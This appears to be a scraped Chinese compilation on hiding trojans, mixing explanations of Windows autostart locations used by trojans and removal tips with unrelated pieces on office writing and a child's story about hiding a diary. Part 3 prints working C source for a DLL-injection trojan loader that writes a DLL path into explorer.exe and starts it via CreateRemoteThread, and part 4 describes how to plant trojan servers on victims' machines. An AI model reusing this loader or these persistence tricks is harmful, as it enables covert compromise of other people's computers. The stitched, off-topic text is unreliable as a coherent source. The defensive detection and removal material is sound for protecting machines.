关于木马隐藏的一个新方法

关于木马隐藏的一个新方法（通用9篇）

关于木马隐藏的一个新方法 篇1

另一种鲜为人知的启动方式，是在“开始→运行”中执行“Gpedit.msc”。 打开“组策略”，可看到“本地计算机策略”中有两个选项：“计算机配置”与“用户配置”，展开“用户配置→管理模板→系统→登录”，双击“在用户登录时运行这些程序”子项进行属性设置，选定“设置”项中的“已启用”项并单击“显示”按钮弹出“显示内容”窗口，再单击“添加”按钮，在“添加项目”窗口内的文本框中输入要自启动的程序的路径，单击“确定”按钮就完成了，

重新启动计算机，系统在登录时就会自动启动你添加的程序，如果刚才添加的是木马程序，那么一个“隐形”木马就这样诞生了。因为用这种方式添加的自启动程序在系统的“系统配置实用程序”是找不到的，同样在我们所熟知的注册表项中也是找不到的，所以非常危险。

通过这种方式添加的自启动程序虽然被记录在注册表中，但是不在我们所熟知的注册表的HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun项和HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion[Run项内，而是在注册表的HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun项。如果你怀疑你的电脑被种了“木马”，可是又找不到它在哪儿，建议你到注册表的HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun项里找找吧，或是进入“组策略”的“在用户登录时运行这些程序”看看有没有启动的程序。

关于木马隐藏的一个新方法 篇2

“木马”程序隐藏自己的办法

“木马”程序会想尽一切办法隐藏自己，主要途径有：

在任务栏中隐藏自己，这是最基本的，只要把Form的Visible属性设为False、ShowInTaskBar设为False，程序运行时就不会出现在任务栏中 了。

在任务管理器中隐形：木马只要将程序设为“系统服务”就可以很轻松地伪装自己。当然它也会悄无声息地启动，用户不会每次启动后再自己点击“木马”图标来运行服务端，所以“木马”会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方，

查看“木马”是否自动加载

在win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOLTrojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

一个嵌入式dll木马源码 篇3

#include

#include

#include

#pragma comment (lib,“Advapi32.lib”)

int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)//函数头，呵呵，晕!

{

//我们说了要第一步要调用VirtualAllocEx()函数在目标进程中分配内存

//那么我们就得找到目标进程的PID，我们假设把目标进程锁定为explorer.exe

//下面是获取explorer.exe的PID

DWORD pid; //声明PID

HANDLE hSnapshot = NULL;

hSnapshot=createToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);

PROCESSENTRY32 a;

a.dwSize = sizeof(PROCESSENTRY32);

Process32First(hSnapshot,&a);

do

{

if(strcmp(a.szExeFile,“Explorer.exe”)==0)

{

pid = a.th32ProcessID;//匹配，找到

break;

}

}

while(Process32Next(hSnapshot,&a)==TRUE);

CloseHandle (hSnapshot);//，找到了PID，善后

PWSTR pszLibFileRemote = NULL;//待会要作为传递的参数，(实际上是要存放我

//的DLL木马的空间)

HANDLE hRemoteProcess = NULL;

HANDLE hRemoteThread = NULL;

//下面这个OpenProcess() 来打开目标进程的，参数的设置你可以理解成在问系统要对目标进程的权限

hRemoteProcess = OpenProcess(

PROCESS_QUERY_INFORMATION |PROCESS_create_THREAD | //允许远程创建线程

PROCESS_VM_OPERATION | // 允许远程VM操作

PROCESS_VM_WRITE, // 允许远程VM写操作

FALSE, pid);

char CurPath[256]; //用来存放当前路径

GetCurrentDirectory(256,CurPath);//获得当前的路径

strcat(CurPath,“zizai.dll”); //让zizai.dll的路径放入CurPath

//计算DLL路径名需要的内存空间，参考了JIURL的计算方法，强烈致谢

//SHOTGUN计算方法：int changdu = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);

int changdu = (strlen(CurPath)+1)*2;

WCHAR wCurPath[256];

MultiByteToWideChar(CP_ACP,0,CurPath,-1,wCurPath,256);

//调用VirtualAllocEx()函数在目标进程中分配内存

//注意是在远程进程hRemoteProcess的内存空间申请

pszLibFileRemote = (PWSTR)VirtualAllocEx(hRemoteProcess, NULL, changdu, MEM_COMMIT, PAGE_READWRITE);

//用WriteProcessMemory()函数向申请的内存中写入要注入zizai.dll的路径和名称，也就是参数

WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) wCurPath, changdu, NULL);

//远程进程 //具体空间 //路径 //长度

//计算LoadLibraryW的入口地址，也就是远程线程的地址pfn ，用它来启动我们的DLL木马

PTHREAD_START_ROUTINE pfn = (PTHREAD_START_ROUTINE)

GetProcAddress(GetModuleHandle(TEXT(“Kernel32”)), “LoadLibraryW”);//这里怎么会用到Kernel32呢?

//是因为LoadLibraryW函数是在kernel32.dll中定义的，就是用来启动DLL文件

//它只有一个参数，就是DLL文件的路径名(是木马DLL的绝对路径)

//利用createRemoteThread()在远程进程中创建一个线程，这个线程执行LoadLibraryW

//就实现了通过远程线程调用用户的DLL文件

//要把LoadLibraryW的入口地址代入

hRemoteThread = createRemoteThread(hRemoteProcess, NULL, 0, pfn , pszLibFileRemote,0, NULL);

return 0;

种植木马的方法与防范策略 篇4

种植木马的方法与防范策略

。你要使用木马控制对方的电脑，首先需要在对方的的电脑中种植并运行服务端程序，然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。 为了避免不熟悉木马的用户误运行服务端，现在流行的木马都没有提供单独的服务端程序，而是通过用户自己设置来生成服务端，在生成服务端的同时，软件可能会自动使用加壳工具为服务端进行压缩，对服务端起到隐藏保护的作用，

服务端生成以后， 下一步要做的是将服务端植入别人的电脑。常见的是通过系统或者软件的漏洞入侵别人的电脑把木马的服务端植入其的电脑;或者通过Email夹带，把服务端作为附件寄给对方;以及把服务端进行伪装后放到自己的共享文件夹，通过P2P软件，让网友在毫无防范中下载并运行服务端程序。

关于木马隐藏的一个新方法 篇5

比如网络上流行 的木马 smss.exe 这个是其中一种木马的主体 潜伏在 98/winme/xp c:windows目录下 2000 c:winnt .....

假如你中了这个木马 首先我们用进程管理器结束 正在运行的木马smss.exe 然后在C:windows 或 c:winnt目录下 创建一个假的 smss.exe 并设置为只读属性~ （2000/XP NTFS的磁盘格式 的话那就更好 可以用“安全设置” 设置为读取） 这样木马没了~ 以后也不会在感染了这个办法本人测试过对很多木马 都很有效果的，

经过这样的修改后，我现在专门找别人发的木马网址去测试，实验结果是上了大概20个木马网站，有大概15个瑞星会报警，另外5个瑞星没有反映，而我的机器没有添加出来新的EXE文件，也没有新的进程出现，只不过有些木马的残骸留在了IE的临时文件夹里，他们没有被执行起来，没有危险性，所以建议大家经常清理 临时文件夹和IE。

随着病毒编写技术的发展，木马程序对用户的威胁越来越大，尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己，使普通用户很难在中毒后发觉。

防治木马的危害，应该采取以下措施：

第一，安装杀毒软件和个人防火墙，并及时升级。

第二，把个人防火墙设置好安全等级，防止未知程序向外传送数据。

第三，可以考虑使用安全性比较好的浏览器和电子邮件客户端工具。

第四，如果使用IE浏览器，应该安装卡卡安全助手，防止恶意网站在自己电脑上安装不明软件和浏览器插件，以免被木马趁机侵入。

远程控制的木马有：冰河（国人的骄傲，中国第一款木马），灰鸽子，上兴,PCshare，网络神偷，FLUX等，现在通过线程插入技术的木马也有很多.现在的木马程序常常和和DLL文件息息相关，被很多人称之为“DLL木马”，

DLL木马的最高境界是线程插入技术，线程插入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上说，在Windows中的每个进程都有自己的私有内存空间，别的进程是不允许对这个私有空间进行操作的，但是实际上，我们仍然可以利用种种方法进入并操作进程的私有内存，因此也就拥有了那个远程进程相当的权限。无论怎样，都是让木马的核心代码运行于别的进程的内存空间，这样不仅能很好地隐藏自己，也能更好地保护自己。

DLL不能独立运行，所以要想让木马跑起来，就需要一个EXE文件使用动态嵌入技术让DLL搭上其他正常进程的车，让被嵌入的进程调用这个DLL的 DllMain函数，激发木马运行，最后启动木马的EXE结束运行，木马启动完毕。启动DLL木马的EXE是个重要角色，它被称为Loader， Loader可以是多种多样的，Windows的Rundll32.exe也被一些DLL木马用来作为Loader，这种木马一般不带动态嵌入技术，它直接注入Rundll32进程运行，即使你杀了Rundll32进程，木马本体还是存在的。利用这种方法除了可以启动木马之外，不少应用程序也采用了这种启动方式，一个最常见的例子是“3721网络实名”。

3721网络实名”就是通过Rundll32调用“网络实名”的DLL文件实现的。在一台安装了网络实名的计算机中运行注册表编辑器，依次展开 “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”，发现一个名为“CnsMin”的启动项，其键值为“Rundll32 C:WINDOWSDownlo~1CnsMin.dll,Rundll32”，CnsMin.dll是网络实名的DLL文件，这样就通过 Rundll32命令实现了网络实名的功能。

简单防御方法

关于木马隐藏的一个新方法 篇6

【操作方法】 其操作方法为：

（1）打开注册表，依次展开HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionRun，

（2）删除右边的Kernel32 = “C:somepathserver.exe”。（3）关闭注册表，重新启动Windows。

一个新秘书关于写材料的心得体会 篇7

找准规律从容入手

容顺序；其次，遴选素材，按照文章需要挑选和配臵内容；最后，围绕观点、标题、语言等关键点进行加工完善，整体成文。

一、从了解党委办公室的工作规律入手，确定写作思路和文章架构

⒈理性认识，明确县委办公室的工作职责与职能定位

一是职责问题。如果把县委办公室作为一个岗位来看，那么它的职责包括哪些，有没有的主次之分？一般的讲，党委办公室公室的地位和作用角度去分析，“为领导服务”都应该是县委办公室的主要职责。我们总结县委办公室的工作，也主要是围绕这一职责的履行情况去进行。

二是职能问题。“为领导服务”

其实是个很宽泛的概念，对面，这也就是县委办公室职能作用的一种表述。关于这三大职能的逻辑排序，并没有明确的界定。如果要分出主次的话，我认为，无论是站位全县发展大局来审视，还是着眼县委领导决策所需来分析，政务都是首当其冲的，它体现着全局导向和方针政策，是灵魂的、关键的东西，不管是事务和后勤都要由它来统率。所以说，政务服务是办公室工作的“重头戏”。政务服务质量如何，是衡量办公室工作质量的首要标志。我们在保证各项工作正常运转的基础上，应该突出政务服务这个重点，把政务服务作为履行办公室职能的“第一要务”，把不断提高政务服务的质量和水平作为第一追求，本着“紧扣政务、兼顾事务，主动协调、高效服务”的原则，做好办公室工作。具体来说，县委办公室政务服务

⒉拉出框架，做好各项工作的逻辑串联与前后排列

第一步，整体划分两大部分，即业务工作和机关建设。业务工作，包括政务服务、事务服务和后勤服务，是办公室工作的核

言的，本着服从大局的原则，应该摆在后面。

第二步，业务工作部分，按政务→事务→后勤的分类标准

和先后顺序，将各项工作依次纳入。政务（信息、督查、调研、文稿起草和公文制发）居前，事务（综合协调、会务接待、值班、机要保密、办公自动化）居中，后勤最后。实际运用当中，鉴于辅助和执行党委决策，是党委办公室工作的“立身之本”，我们

行分类摆布，其中参与（影响）决策形成包括（信息、调研、文稿起草和公文制发），推动（督促）决策落实包括（综合协调、督促检查），其他归入全程保障决策范畴。关于党史工作、服务中心工作等内容，可以灵活放臵。

至于每个类别（阶段）内部的排序，也有一般的排法。拿信息、调研、文稿起草和公文办理来说，调查研究一般排首位，因为调查研究是谋事之基、成事之道，是领导决策的智囊；其次是信息，因为信息是领导决策的重要依据，是领导了解全局工作的“耳目”；再次是公文（文稿）起草，因为公文和重要文稿是领导实施决策、部署工作的重要形式，是领导“左右手”；最后是公文办理，这里主要指上级文件的传阅办理，这是落实上级精神，形成本级决策的重要过程。

第三步，机关建设部分，一般分成干部队伍建设和制度机制建设两个方面，前者突出的是人的因素，后者着重于纪律规范的二、掌握原则，根据不同工作的特点要求，对素材进行梳理和取舍

要本着“抓住核心、突出重点”的原则，掌握好点与面（既要掌握好主次、详略，确保重点工作突出出来，也要兼顾全局，不能漏项）、定性与定量（既要有准确精练的评价性语句，也要适当配上有代表性、说服力强的数字）的关系，进行选材。具体来说，调查研究的素材选用，要重点看在紧扣党委工作重点、领导关注焦点和群众反映热点的方面做了哪些，出了哪些思想性、政策性、建设性和可操作性强的调查成果，获上级和同级党委重视采纳的有哪些；信息工作的素材选用，要侧重看在发挥信息主渠道作用，提高信息质量，改进信息工作方法方面做了哪些，有哪些得到了上级采用和领导批示，对党委工作有何促进作用；文稿起草和公文制发的素材选用，要重点看在提高文字写作水平、强化发文审核上下了哪些功夫，承担了哪些重要工作任

务，出了哪些高质量成果，等等。

三、在思路观点、标题制作、语言运用三个方面下足功夫

观点要求鲜明、准确，紧贴县委和县委领导思路，不能夸大编造，经得起推敲，也要与时俱进，不断推陈出新。标题，要求简短有力、新颖特别、彰显工作亮点，同一层次的标题风格和结构上保持一致。

关于木马隐藏的一个新方法 篇8

发现木马

由于木马是基于远程控制的程序，因此，中木马的机器会开有特定的端口。一般一台个人用的系统在开机后最多只有137、138、139三个端口。若上网，会有其他端口，这是本机与网上主机通讯时打开的，如IE一般会打开连续的端口:1025，1026，1027等。

在DOS命令行下用”netstat-na”命令可以看到本机所有打开的端口。如果发现除了以上所说的端口外，还有其他端口被占用(特别是木马常用端口被占用)，那可要好好查查了，很有可能中了木马。

查找木马

要使你的系统能显示隐藏文件，因为一些木马文件属性是隐藏的。多数木马都会把自身复制到系统目录下并加入启动项(如果不复制到系统目录下则很容易被发现，不加入启动项在重启后木马就不执行了)，启动项一般都是加在注册表中的，具体位置在：HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值;HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值;HKEY_USERSDefaultSoftwareMicrosoftWindowsCurrentVersion下所有以“Run”开头的键值。

不过，也有一些木马不在这些地方加载，它们躲在下面这些地方:

●在Win.ini中启动

在Win.ini的[windows]字段中有启动命令“load=”和“run=”，在一般情况下“＝”后面是空白的，如果有程序，比方说是:run=c:windowsfile.exe或load=c:windowsfile.exe，要小心了，这个file.exe很可能就是木马。

●在System.ini中启动

System.ini位于Windows的安装目录下，其[boot]字段的shell=Explorer.exe是木马喜欢的隐蔽加载之所，木马通常的做法是将该句变为这样:shell=Explorer.exewindow.exe，注意这里的window.exe就是木马程序。

另外，在System.ini中的[386Enh]字段，要注意检查在此段内的“driver=路径程序名”，这里也有可能被木马所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这三个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所。

●在Autoexec.bat和Config.sys中加载运行

这种加载方式一般都需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行，而且采用这种方式不是很隐蔽，所以这种方法并不多见，但也不能因此而掉以轻心。

●在Winstart.bat中启动

Winstart.bat是一个特殊性丝毫不亚于Autoexec.bat的批处理文件，也是一个能自动被Windows加载运行的文件。它多数情况下为应用程序及Windows自动生成，在执行了Win.com并加载了多数驱动程序之后开始执行，

由于Autoexec.bat的功能可以由Winstart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。

●启动组

木马隐藏在启动组虽然不是十分隐蔽，但这里的确是自动加载运行的好场所，因此，还是有木马喜欢在这里驻留的。启动组对应的文件夹为:C:WindowsStartMenuProgramsStartUp，在注册表中的位置:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersStartup=C:windowsstartmenuprogramsstartup。

●*.INI

即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖同名文件，这样就可以达到启动木马的目的了。

●修改文件关联

修改文件关联是木马常用手段(主要是国产木马，老外的木马大都没有这个功能)，比方说，正常情况下txt文件的打开方式为Notepad.EXE文件，但一旦中了文件关联木马，则txt文件打开方式就会被修改为用木马程序打开，如著名的冰河就是这样干的。一旦你双击一个txt文件，原本应用Notepad打开该文件的，现在却变成启动木马程序了。请大家注意，不仅仅是txt文件，其他诸如HTM、EXE、ZIP、COM等都是木马的目标。对付这类木马，只能检查HKEY_CLASSES_ROOT文件类型shellopencommand主键，查看其键值是否正常。

●捆绑文件

实现这种触发条件首先要控制端和服务端已通过木 立连接，然后，控制端用户用工具软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样，即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。绑定到某一应用程序中，如绑定到系统文件，那么，每一次Windows启动均会启动木马。

手工清除木马

如果发现自己的硬盘总是莫明其妙地读盘，软驱灯经常自己亮起，网络连接及鼠标、屏幕出现异常现象，很可能就是因为有木马潜伏在你的机器里面，此时，就应该想办法清除它们了。

当发现可疑文件时，可以试试能不能删除它，因为木马多是以后台方式运行，通过按“CtrlAltDel”是找不到的，而后台运行的应是系统进程。如果在前台进程里找不到，而又删不了(提示正在被使用)，那就应该注意了。

那么，如何清除木马而不误删其他有用文件呢？当你通过上述方法找到可疑程序时，你可以先看看该文件的属性。一般系统文件的修改时间应是或，而不应该是最近的时间(安装最新的Win、winxp的系统除外)，文件的创建时间应当不会离现在很近。当看到可疑的执行文件时间是最近甚至是当前，那八成就有问题了。

首先，查进程。检查进程可以借助第三方软件，如Windows优化大师，利用其“查看进程”功能把可疑进程杀掉，然后，再看看原来怀疑的端口还有没有开放(有时需重启)，如果没有了，那说明杀对了，再把该程序删掉，这样，就手工删除了这个木马了。

关于如何隐藏日记（最终版） 篇9

正在这时，妈妈拿着一瓶果汁和几个杯子进来了，妈妈说：“你们刚才说的，我都听见了，诶，我可没偷看日记，一说到日记啊我就气！”“妈妈，怎么回事呀？”“告诉你们啊，以前我妈妈也偷看我日记来着。可我有法子啊，之后我妈尽管我弟弟要我日记，我弟弟当然不知道我日记在哪了，他就随口说被我带走了，于是我妈在家门口守着，我一进门，我妈就管我要试卷，其实啊，目的是要找日记，她找不着呀，日记不在我书包里呀…”妈妈刚要说下去，就被我打断了，“妈妈，进入正题，你的法子到底是什么呀？”“对呀对呀，我们也想知道！”大家异口同声地说。“呵呵，好吧。”

“我的法子就是把日记放在我妈的衣柜里，哈哈。”妈妈说着说着乐了。

“啊？这不是更容易被发现吗？”李琴说。

“是啊，你们没听说最危险的地方就是最安全的地方吗。”

“话虽如此，可还是容易被发现埃”

“你是说放衣服的时候吧，唉呀，那我早就想好了，所以我藏在被褥里呀。”

“原来如此！妈妈，以后有劳您了。”

“行了！别那么多心思，写作业去！”

“是！”